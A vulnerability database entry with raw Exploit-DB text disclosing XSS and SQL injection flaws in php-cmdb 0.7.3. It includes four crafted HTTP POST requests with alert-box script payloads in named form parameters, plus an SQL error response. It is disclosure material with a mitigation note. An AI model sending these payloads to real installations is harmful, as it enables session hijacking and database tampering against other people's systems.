Multiple vulnerabilities in PHP-CMDB

vendor:

php-cmdb

by:

HauntIT Blog

8,8

CVSS

HIGH

XSS and SQL Injection

79, 89

CWE

Product Name: php-cmdb

Affected Version From: 0.7.3

Affected Version To: 0.7.3

Patch Exists: YES

Related CWE: N/A

CPE: a:php-cmdb:php-cmdb:0.7.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Multiple vulnerabilities in PHP-CMDB

Multiple vulnerabilities exist in PHP-CMDB version 0.7.3, including XSS and SQL Injection. An attacker can exploit these vulnerabilities by sending a maliciously crafted request to the vulnerable application. The XSS payload is sent in the 's_text', 'ci_icon', 's_text', 's_cit_id', 's_cat_id', 's_compare_operator', 'u_login', 'u_last_name', 'u_first_name', and 'u_password_confirm' parameters, while the SQL Injection payload is sent in the 's_text' and 'u_login' parameters.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it does not contain malicious code. Additionally, parameterized queries should be used to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# ==============================================================
# Title ...| Multiple vulnerabilities in PHP-CMDB
# Version .| php-cmdb_0.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| 
# ==============================================================

[+] From admin logged-in
 

# ==============================================================
# 1. XSS in SQL error

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 57

s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
---<request>---


---<response>---
<td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
</tr>
---<response>---

Same parameter seems to be vulnerable to SQL Injection attack.
("The used SELECT statements have a different number of columns")

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 93

ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
---<request>---



# ==============================================================
# 3. XSS /SQLi 

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 100

s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
---<request>---


# ==============================================================
# 4. XSS / SQLi

---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 153

u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/